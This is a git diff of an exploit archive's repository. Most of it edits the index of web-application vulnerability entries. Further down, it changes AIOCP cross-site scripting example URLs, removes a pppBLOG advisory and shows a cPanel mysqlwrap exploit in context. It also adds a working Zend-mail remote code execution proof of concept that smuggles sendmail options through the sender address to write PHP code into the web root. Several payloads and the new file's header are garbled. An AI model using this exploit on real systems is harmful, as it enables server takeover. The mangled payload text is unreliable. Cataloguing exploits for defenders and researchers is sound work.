28560,platforms/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,php,webapps,0 28562,platforms/hardware/webapps/28562.txt,"Hewlett-Packard (HP) 2620 Switch Series. Edit Admin Account - Cross-Site Request Forgery",2013-09-26,"Hubert Gradek",hardware,webapps,0 28563,platforms/multiple/webapps/28563.txt,"Posnic Stock Management System 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps,0 @@ -30082,24 +30082,24 @@ id,file,description,date,author,platform,type,port 28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 - Install.php3 Remote File Inclusion",2006-11-06,Mahmood_ali,php,webapps,0 28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 - NewList.php Cross-Site Scripting",2006-11-06,CvIr.System,php,webapps,0 28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection (2)",2006-11-06,Liz0ziM,php,webapps,0 -28917,platforms/php/webapps/28917.txt,"AIOCP 1.3.x - 'cp_forum_view.php' Multiple Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 -28918,platforms/php/webapps/28918.txt,"AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 -28919,platforms/php/webapps/28919.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' order_field Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 -28920,platforms/php/webapps/28920.txt,"AIOCP 1.3.x - 'cp_users_online.php order_field Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 -28921,platforms/php/webapps/28921.txt,"AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 -28922,platforms/php/webapps/28922.txt,"AIOCP 1.3.x - '/admin/code/index.php' load_page Parameter Remote File Inclusion",2006-11-06,"laurent gaffie",php,webapps,0 -28923,platforms/php/webapps/28923.txt,"AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28924,platforms/php/webapps/28924.txt,"AIOCP 1.3.x - 'cp_news.php' Multiple Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28925,platforms/php/webapps/28925.txt,"AIOCP 1.3.x - 'cp_forum_view.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28926,platforms/php/webapps/28926.txt,"AIOCP 1.3.x - 'cp_edit_user.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28927,platforms/php/webapps/28927.txt,"AIOCP 1.3.x - 'cp_newsletter.php' Multiple Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28928,platforms/php/webapps/28928.txt,"AIOCP 1.3.x - 'cp_links.php' Multiple Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28929,platforms/php/webapps/28929.txt,"AIOCP 1.3.x - 'cp_contact_us.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28930,platforms/php/webapps/28930.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Multiple Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28931,platforms/php/webapps/28931.txt,"AIOCP 1.3.x - 'cp_login.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28932,platforms/php/webapps/28932.txt,"AIOCP 1.3.x - 'cp_users_online.php' order_field Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28933,platforms/php/webapps/28933.txt,"AIOCP 1.3.x - 'cp_codice_fiscale.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28934,platforms/php/webapps/28934.txt,"AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28917,platforms/php/webapps/28917.txt,"AIOCP 1.3.x - 'cp_forum_view.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 +28918,platforms/php/webapps/28918.txt,"AIOCP 1.3.x - 'cp_dpage.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 +28919,platforms/php/webapps/28919.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 +28920,platforms/php/webapps/28920.txt,"AIOCP 1.3.x - 'cp_users_online.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 +28921,platforms/php/webapps/28921.txt,"AIOCP 1.3.x - 'cp_links_search.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 +28922,platforms/php/webapps/28922.txt,"AIOCP 1.3.x - 'load_page' Parameter Remote File Inclusion",2006-11-06,"laurent gaffie",php,webapps,0 +28923,platforms/php/webapps/28923.txt,"AIOCP 1.3.x - 'cp_dpage.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28924,platforms/php/webapps/28924.txt,"AIOCP 1.3.x - 'cp_news.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28925,platforms/php/webapps/28925.txt,"AIOCP 1.3.x - 'cp_forum_view.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28926,platforms/php/webapps/28926.txt,"AIOCP 1.3.x - 'cp_edit_user.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28927,platforms/php/webapps/28927.txt,"AIOCP 1.3.x - 'cp_newsletter.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28928,platforms/php/webapps/28928.txt,"AIOCP 1.3.x - 'cp_links.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28929,platforms/php/webapps/28929.txt,"AIOCP 1.3.x - 'cp_contact_us.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28930,platforms/php/webapps/28930.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28931,platforms/php/webapps/28931.txt,"AIOCP 1.3.x - 'cp_login.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28932,platforms/php/webapps/28932.txt,"AIOCP 1.3.x - 'cp_users_online.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28933,platforms/php/webapps/28933.txt,"AIOCP 1.3.x - 'cp_codice_fiscale.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28934,platforms/php/webapps/28934.txt,"AIOCP 1.3.x - 'cp_links_search.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 28935,platforms/php/webapps/28935.txt,"AIOCP 1.3.x - Multiple Vulnerabilities",2006-11-06,"laurent gaffie",php,webapps,0 28936,platforms/php/webapps/28936.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 28937,platforms/php/webapps/28937.txt,"AIOCP 1.3.x - 'cp_show_page_help.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 @@ -30214,7 +30214,7 @@ id,file,description,date,author,platform,type,port 29221,platforms/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 - Admin.pl Cross-Site Scripting",2006-12-04,"Jesus Olmos Gonzalez",cgi,webapps,0 29222,platforms/php/webapps/29222.txt,"Cerberus Helpdesk 2.x - Spellwin.php Cross-Site Scripting",2006-12-04,"En Douli",php,webapps,0 29068,platforms/php/webapps/29068.txt,"WordPress Theme Area53 - Arbitrary File Upload",2013-10-19,"Byakuya Kouta",php,webapps,80 -29071,platforms/php/webapps/29071.txt,"CPanel 10 - DNSlook.HTML Cross-Site Scripting",2006-11-17,"Aria-Security Team",php,webapps,0 +29071,platforms/php/webapps/29071.txt,"cPanel 10 - DNSlook.HTML Cross-Site Scripting",2006-11-17,"Aria-Security Team",php,webapps,0 29072,platforms/php/webapps/29072.txt,"PHP Upload Tool 1.0 - Arbitrary File Upload / Directory Traversal",2006-11-17,"Craig Heffner",php,webapps,0 29073,platforms/asp/webapps/29073.txt,"ASPCart 4.5 - Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 29074,platforms/asp/webapps/29074.txt,"20/20 Real Estate 3.2 - Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 @@ -30297,7 +30297,7 @@ id,file,description,date,author,platform,type,port 29178,platforms/asp/webapps/29178.txt,"Fixit iDms Pro Image Gallery - filelist.asp Multiple Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29179,platforms/asp/webapps/29179.txt,"Fixit iDms Pro Image Gallery - showfile.asp fid Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29180,platforms/asp/webapps/29180.txt,"SIAP CMS - 'login.asp' SQL Injection",2006-11-25,nagazakig74,asp,webapps,0 -29181,platforms/php/webapps/29181.txt,"CPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities",2006-11-25,"Aria-Security Team",php,webapps,0 +29181,platforms/php/webapps/29181.txt,"cPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities",2006-11-25,"Aria-Security Team",php,webapps,0 29182,platforms/php/webapps/29182.txt,"cPanel WebHost Manager 3.1 - dochangeemail email Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 29183,platforms/php/webapps/29183.txt,"cPanel WebHost Manager 3.1 - addon_configsupport.cgi supporturl Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 29184,platforms/php/webapps/29184.txt,"cPanel WebHost Manager 3.1 - editpkg pkg Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 @@ -30331,7 +30331,7 @@ id,file,description,date,author,platform,type,port 29227,platforms/asp/webapps/29227.txt,"Vt-Forum Lite 1.3 - vf_info.asp StrMes Parameter Cross-Site Scripting",2006-12-04,St@rExT,asp,webapps,0 29228,platforms/asp/webapps/29228.txt,"Vt-Forum Lite 1.3 - vf_newtopic.asp IFRAME Element Cross-Site Scripting",2006-12-04,St@rExT,asp,webapps,0 29328,platforms/php/webapps/29328.txt,"ImpressPages CMS 3.6 - Arbitrary File Deletion",2013-11-01,LiquidWorm,php,webapps,0 -29237,platforms/php/webapps/29237.txt,"CPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting",2006-12-08,"Aria-Security Team",php,webapps,0 +29237,platforms/php/webapps/29237.txt,"cPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting",2006-12-08,"Aria-Security Team",php,webapps,0 29238,platforms/php/webapps/29238.txt,"cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-12-08,"Aria-Security Team",php,webapps,0 29240,platforms/asp/webapps/29240.txt,"Cilem Haber Free Edition - hata.asp hata Parameter Cross-Site Scripting",2006-12-08,ShaFuck31,asp,webapps,0 29241,platforms/asp/webapps/29241.txt,"MaviPortal - Arama.asp Cross-Site Scripting",2006-12-09,St@rExT,asp,webapps,0 @@ -30582,7 +30582,7 @@ id,file,description,date,author,platform,type,port 29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine - Affichearticles.php3 Remote File Inclusion",2007-02-06,Blaster,php,webapps,0 29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Cross-Site Request Forgery (Change Admin Password)",2013-11-13,"Hubert Gradek",hardware,webapps,0 29571,platforms/php/webapps/29571.txt,"SYSCP 1.2.15 - System Control Panel CronJob Arbitrary Code Execution",2007-02-07,"Daniel Schulte",php,webapps,0 -29572,platforms/php/webapps/29572.txt,"CPanel 11 - PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps,0 +29572,platforms/php/webapps/29572.txt,"cPanel 11 - PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps,0 29574,platforms/php/webapps/29574.php,"eXtreme File Hosting - Arbitrary .RAR File Upload",2007-02-09,"hamed bazargani",php,webapps,0 29576,platforms/jsp/webapps/29576.txt,"Atlassian JIRA 3.7.3 - BrowseProject.JSPA Cross-Site Scripting",2007-02-09,BL4CK,jsp,webapps,0 29578,platforms/php/webapps/29578.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagviewer.php Multiple Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 @@ -31031,7 +31031,7 @@ id,file,description,date,author,platform,type,port 30382,platforms/asp/webapps/30382.txt,"W1L3D4 philboard 0.3 - Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps,0 30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0 30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 - Mail A Friend Open Email Relay",2007-07-24,"Adrian Pastor",php,webapps,0 -30380,platforms/php/webapps/30380.txt,"CPanel 10.9.1 - Resname Parameter Cross-Site Scripting",2007-07-24,"Aria-Security Team",php,webapps,0 +30380,platforms/php/webapps/30380.txt,"cPanel 10.9.1 - Resname Parameter Cross-Site Scripting",2007-07-24,"Aria-Security Team",php,webapps,0 30803,platforms/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 - Login SQL Injection",2007-11-24,"Aria-Security Team",php,webapps,0 30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer - 'default.asp' SQL Injection",2007-11-21,"Aria-Security Team",asp,webapps,0 30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection",2007-11-21,The-0utl4w,asp,webapps,0 @@ -31427,7 +31427,7 @@ id,file,description,date,author,platform,type,port 30983,platforms/php/webapps/30983.txt,"ExpressionEngine 1.2.1 - HTTP Response Splitting / Cross-Site Scripting",2008-01-03,MustLive,php,webapps,0 30984,platforms/php/webapps/30984.txt,"eTicket 1.5.5 - 'newticket.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-03,"Omer Singer",php,webapps,0 31083,platforms/php/webapps/31083.txt,"Nilson's Blogger 0.11 - 'comments.php' Local File Inclusion",2008-01-31,muuratsalo,php,webapps,0 -30987,platforms/php/webapps/30987.txt,"netRisk 1.9.7 - 'index.php' Remote File Inclusion",2008-01-04,S.W.A.T.,php,webapps,0 +30987,platforms/php/webapps/30987.txt,"NetRisk 1.9.7 - 'index.php' Remote File Inclusion",2008-01-04,S.W.A.T.,php,webapps,0 30988,platforms/php/webapps/30988.txt,"Rotabanner Local 2/3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30992,platforms/php/webapps/30992.txt,"Strawberry 1.1.1 - 'html.php' Remote Code Execution",2008-01-07,"Eugene Minaev",php,webapps,0 30993,platforms/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps,0 @@ -32376,7 +32376,7 @@ id,file,description,date,author,platform,type,port 32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 - 'index.php' Cross-Site Scripting",2008-10-11,d3v1l,php,webapps,0 32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary File Upload",2014-03-24,"felipe andrian",php,webapps,0 32520,platforms/php/webapps/32520.txt,"OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0 -32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro - 'id' Parameter SQL Injection",2008-11-02,"Hussin X",php,webapps,0 +32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro - 'tr.php' SQL Injection",2008-11-02,"Hussin X",php,webapps,0 32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi - 'xurunler.asp' SQL Injection",2008-10-13,tRoot,asp,webapps,0 32486,platforms/php/webapps/32486.txt,"Webscene eCommerce - 'productlist.php' SQL Injection",2008-10-14,"Angela Chang",php,webapps,0 32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 - modules/mod_language.php Multiple Parameter Cross-Site Scripting",2008-10-14,faithlove,php,webapps,0 @@ -32634,7 +32634,7 @@ id,file,description,date,author,platform,type,port 32895,platforms/multiple/webapps/32895.txt,"IBM Bladecenter Advanced Management Module 1.42 - private/file_Management.ssi PATH Parameter Cross-Site Scripting",2009-04-09,"Henri Lindberg",multiple,webapps,0 32896,platforms/multiple/webapps/32896.html,"IBM Bladecenter Advanced Management Module 1.42 - Cross-Site Request Forgery",2009-04-09,"Henri Lindberg",multiple,webapps,0 32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection",2009-04-09,"Usman Saeed",java,webapps,0 -32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection",2009-04-09,"ThE g0bL!N",asp,webapps,0 +32898,platforms/asp/webapps/32898.txt,"Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection",2009-04-09,"ThE g0bL!N",asp,webapps,0 32903,platforms/asp/webapps/32903.txt,"People-Trak - Login SQL Injection",2009-04-13,Mormoroth.net,asp,webapps,0 32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - 'apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0 32908,platforms/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps,0 @@ -32828,7 +32828,7 @@ id,file,description,date,author,platform,type,port 33291,platforms/php/webapps/33291.txt,"Snitz Forums 2000 3.4.7 - Sound Tag Onload Attribute Cross-Site Scripting",2009-10-15,"Andrea Fabrizi",php,webapps,0 33292,platforms/jsp/webapps/33292.txt,"IBM Rational RequisitePro 7.10 - ReqWeb Help Feature ReqWebHelp/advanced/workingSet.jsp Operation Parameter Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 33293,platforms/jsp/webapps/33293.txt,"IBM Rational RequisitePro 7.10 - ReqWeb Help Feature ReqWebHelp/basic/searchView.jsp Multiple Parameter Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 -33294,platforms/php/webapps/33294.txt,"TBmnetCMS 1.0 - 'content' Parameter Cross-Site Scripting",2009-10-19,"drunken danish rednecks",php,webapps,0 +33294,platforms/php/webapps/33294.txt,"TBmnetCMS 1.0 - Cross-Site Scripting",2009-10-19,"drunken danish rednecks",php,webapps,0 33295,platforms/php/webapps/33295.txt,"OpenDocMan 1.2.5 - add.php last_message Parameter Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 33296,platforms/php/webapps/33296.txt,"OpenDocMan 1.2.5 - toBePublished.php Multiple Parameter Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 33297,platforms/php/webapps/33297.txt,"OpenDocMan 1.2.5 - 'index.php' last_message Parameter Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 @@ -34145,7 +34145,6 @@ id,file,description,date,author,platform,type,port 35514,platforms/php/webapps/35514.txt,"OrangeHRM 2.6.2 - 'jobVacancy.php' Cross-Site Scripting",2011-03-27,"AutoSec Tools",php,webapps,0 35515,platforms/php/webapps/35515.txt,"Alkacon OpenCMS 7.5.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0 35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Parameter Local File Inclusion",2011-03-28,eidelweiss,php,webapps,0 -35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 - 'search.php' Cross-Site Scripting",2011-03-28,"kurdish hackers team",php,webapps,0 35557,platforms/php/webapps/35557.txt,"PHP-Fusion - 'article_id' Parameter SQL Injection",2011-04-04,KedAns-Dz,php,webapps,0 35520,platforms/php/webapps/35520.txt,"Claroline 1.10 - Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0 35521,platforms/php/webapps/35521.txt,"osCSS 2.1 - Cross-Site Scripting / Multiple Local File Inclusion",2011-03-29,"AutoSec Tools",php,webapps,0 @@ -36930,3 +36929,4 @@ id,file,description,date,author,platform,type,port 40976,platforms/php/webapps/40976.txt,"WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload",2016-12-29,r3m1ck,php,webapps,0 40977,platforms/hardware/webapps/40977.txt,"Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection",2016-12-29,LiquidWorm,hardware,webapps,0 40978,platforms/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,hardware,webapps,0 +40979,platforms/php/webapps/40979.php,"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution",2016-12-30,"Dawid Golunski",php,webapps,0 diff --git a/platforms/php/webapps/28660.php b/platforms/php/webapps/28660.php index 0faf54285..8d98a0ae6 100755 --- a/platforms/php/webapps/28660.php +++ b/platforms/php/webapps/28660.php @@ -50,7 +50,7 @@ fclose($f); passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima"); } ?> -</textarea> +
Powered By Ashiyane Security Corporation www.Ashiyane.ir diff --git a/platforms/php/webapps/28917.txt b/platforms/php/webapps/28917.txt index 7a367e9c0..1104fe66c 100755 --- a/platforms/php/webapps/28917.txt +++ b/platforms/php/webapps/28917.txt @@ -6,6 +6,6 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica AIOCP 1.3.007 and prior versions are vulnerable. -http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=</textarea>'"> -http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"> -http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid=</textarea>'"> \ No newline at end of file +http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid='"> +http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid='"> +http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid='"> \ No newline at end of file diff --git a/platforms/php/webapps/28918.txt b/platforms/php/webapps/28918.txt index e07562085..eef352f2b 100755 --- a/platforms/php/webapps/28918.txt +++ b/platforms/php/webapps/28918.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica AIOCP 1.3.007 and prior versions are vulnerable. -http://www.example.com/public/code/cp_dpage.php?choosed_language=</textarea>'"> \ No newline at end of file +http://www.example.com/public/code/cp_dpage.php?choosed_language='"> \ No newline at end of file diff --git a/platforms/php/webapps/28919.txt b/platforms/php/webapps/28919.txt index e15b22d0b..97591510a 100755 --- a/platforms/php/webapps/28919.txt +++ b/platforms/php/webapps/28919.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica AIOCP 1.3.007 and prior versions are vulnerable. -http://www.example.com/public/code/cp_show_ec_products.php?order_field=</textarea>'"> \ No newline at end of file +http://www.example.com/public/code/cp_show_ec_products.php?order_field='"> \ No newline at end of file diff --git a/platforms/php/webapps/28920.txt b/platforms/php/webapps/28920.txt index 4ab651c22..ed8a97b0e 100755 --- a/platforms/php/webapps/28920.txt +++ b/platforms/php/webapps/28920.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica AIOCP 1.3.007 and prior versions are vulnerable. -http://www.example.com/public/code/cp_users_online.php?order_field=</textarea>'"> \ No newline at end of file +http://www.example.com/public/code/cp_users_online.php?order_field='"> \ No newline at end of file diff --git a/platforms/php/webapps/28921.txt b/platforms/php/webapps/28921.txt index d9fdf2747..c670f0473 100755 --- a/platforms/php/webapps/28921.txt +++ b/platforms/php/webapps/28921.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica AIOCP 1.3.007 and prior versions are vulnerable. -http://www.example.com/public/code/cp_links_search.php?orderdir=</textarea>'"> \ No newline at end of file +http://www.example.com/public/code/cp_links_search.php?orderdir='"> \ No newline at end of file diff --git a/platforms/php/webapps/35517.txt b/platforms/php/webapps/35517.txt deleted file mode 100755 index c3fb15687..000000000 --- a/platforms/php/webapps/35517.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/47068/info - -pppBLOG is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - -pppBLOG 0.3.0 is vulnerable; other versions may also be affected. - -http://www.example.com/search.php?q= \ No newline at end of file diff --git a/platforms/php/webapps/40979.php b/platforms/php/webapps/40979.php new file mode 100755 index 000000000..a6cfd72e8 --- /dev/null +++ b/platforms/php/webapps/40979.php @@ -0,0 +1,96 @@ + +09607 <<< +09607 <<< +09607 <<< + + +See the full advisory URL for the exploit details. + +*/ + + +// Attacker's input coming from untrusted source such as $_GET , $_POST etc. +// For example from a Contact form with sender field + +$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com'; +// encoded phpinfo() php code +$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg=="); + + + +// ------------------ + +// mail() param injection via the vulnerability in zend-mail + + +chdir(dirname(__DIR__)); +include 'vendor/Zend/Loader/AutoloaderFactory.php'; + +Zend\Loader\AutoloaderFactory::factory(array( + 'Zend\Loader\StandardAutoloader' => array( + 'autoregister_zf' => true + ) +)); + +Zend\Mvc\Application::init(require 'config/application.php')->run(); + +$message = new \Zend\Mail\Message(); + +$message->setBody($msg_body); +$message->setFrom($email_from, 'Attacker'); +$message->addTo('support@localhost', 'Support'); +$message->setSubject('Zend PoC'); + +$transport = new \Zend\Mail\Transport\Sendmail(); +$transport->send($message); + +?> + +